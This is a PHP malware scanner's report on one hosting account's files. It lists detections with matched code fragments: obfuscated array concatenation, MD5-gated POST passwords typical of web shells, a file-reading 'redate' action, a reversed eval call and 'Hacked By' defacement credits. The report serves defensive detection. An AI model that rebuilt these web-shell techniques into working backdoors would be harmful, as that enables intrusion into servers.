Exploit concat_vars_array Line: 3055 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{7}.$O00O0O{19}.$O00O0O{19}.$O00O0O{15}.$O00O0O{64}.$O00O0O{65}.$O00O0O{65}
| Exploit concat_vars_array Line: 3424 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{14}.$O00O0O{17}.$O00O0O{4}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25}
| Exploit concat_vars_array Line: 697 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{1}.$O00O0O{62}.$O00O0O{18}.$O00O0O{63}.$O00O0O{15}.$O00O0O{13}.$O00O0O{6}
| Exploit concat_vars_array Line: 700 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{64}.$O00O0O{12}.$O00O0O{14}.$O00O0O{3}.$O00O0O{62}.$O00O0O{18}.$O00O0O{4}
| Exploit concat_vars_array Line: 970 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{19}.$O00O0O{22}.$O00O0O{12}.$O00O0O{1}.$O00O0O{0}.$O00O0O{12}.$O00O0O{0}
| Exploit password_protection_md5 Line: 2056 Warning MD5 Password protection file, typically used on web shells | <?php md5($_POST["redate"])=='b6772c68627f804a9578152ee90f5b0c'
| Exploit password_protection_md5 Line: 2057 Warning MD5 Password protection file, typically used on web shells | <?php md5($_POST["test"])=='b6772c68627f804a9578152ee90f5b0c'
| Sign 0d0fd2c0 Line: 101 Dangerous Malware Signature (hash: 0d0fd2c0) | <?php $arr_word[0][] ="10";$arr_word[0][] ="5";$arr_word[0][] ="4";$arr_word[0][] ="5";$arr_word[0][] ="4";$arr_word[0][] ="7";$arr_word[0][] ="8";$arr_word[0][] ="11";$arr_word[0][] ="6";$arr_word[0][] ="6";$arr_word[0][] ="9";$arr_word[0][] ="8";$arr_word[0][] ="7";$arr_word[1][] ="5";$arr_word[1][] ="7";$arr_word[1][] ="6";$arr_word[1][] ="4";$arr_word[1][] ="8";$arr_word[1][] ="6";$arr_word[1][] ="10";$arr_word[1][] ="9";$arr_word[1][] ="4";$arr_word[1][] ="5";$arr_word[1][] ="8";$arr_word[1][] ="...
| Sign 0f37c730 Line: 948 Dangerous Malware Signature (hash: 0f37c730) | <?php moban.html
| Sign 689d8acc Line: 3094 Dangerous Malware Signature (hash: 689d8acc) | <?php if(isset($act) && $act == 'redate' && isset($redate_file)){
if(file_exists($redate_file)){
echo rdFile($redate_file);
}
}
| Sign 99fc3b9d Line: 3000 Dangerous Malware Signature (hash: 99fc3b9d) | <?php $data = curl_get_from_webpage_one_time($url
| Sign a408f408 Line: 1955 Dangerous Malware Signature (hash: a408f408) | <?php curl_get_from_webpage
| Sign f822975d Line: 2056 Dangerous Malware Signature (hash: f822975d) | <?php if(file_exists($redate_file)){
| Sign ff4f5344 Line: 2989 Dangerous Malware Signature (hash: ff4f5344) | <?php function rmhtmltag2($tagname='',$str=''){
$rulers = '#<'.$tagname
| Sign ff4f5344 Line: 3026 Dangerous Malware Signature (hash: ff4f5344) | <?php function curl_get_from_webpage_one_time($url
|
|
/custdata02/duane/tmp/pma_template_compiles_duane/twig/88/88cd4d6b2c22748f333fb81db7b5a551e95ac1d670452ec33abe14c77132040d.php Size: 22.51 kB Created: 2019-09-09 20:56:14 Modified: 2019-09-09 20:56:14 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 54 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/duane/tmp/pma_template_compiles_duane/twig/f9/f96b624cf3d2f1a14c636ea43a86e9b129d49a28b0a80b5e644a366b34e81287.php Size: 10.95 kB Created: 2019-09-09 20:56:14 Modified: 2019-09-09 20:56:14 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 36 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/duane/tmp/pma_template_compiles_duane/twig/eb/ebad70c3711a96854395e345192e3618a35739360804f28b54d23d4b49eca4b0.php Size: 22.80 kB Created: 2022-04-13 17:11:08 Modified: 2022-04-13 17:11:08 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 65 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/duane/tmp/pma_template_compiles_duane/twig/af/af6dd1f6871b54f086eb95e1abc703a0e92824251df6a715be3d3628d2bd3143.php Size: 22.80 kB Created: 2020-10-01 13:08:24 Modified: 2020-10-01 13:08:24 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 65 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/duane/tmp/pma_template_compiles_duane/twig/a4/a49a944225d69636e60c581e17aaceefffebe40aeb5931afd4aaa3da6a0039b9.php Size: 11.32 kB Created: 2020-10-01 13:08:24 Modified: 2020-10-01 13:08:24 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 47 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/duane/tmp/pma_template_compiles_duane/twig/cc/ccb726244b12924b146fd2ecb99d5c0d41d0dce15d84681f00c0aab5af9d43a6.php Size: 11.32 kB Created: 2022-04-13 17:11:08 Modified: 2022-04-13 17:11:08 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 47 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/duane/index.php Size: 9.48 kB Created: 2014-11-09 19:09:53 Modified: 2019-03-09 21:17:50 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 215 Dangerous Hacker credits | <?php Hacked By
|
|
/custdata02/duane/x.php Size: 22.00 B Created: 2014-11-07 20:47:47 Modified: 2019-03-09 21:17:50 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Dangerous Hacker credits | <?php hacked by
|
|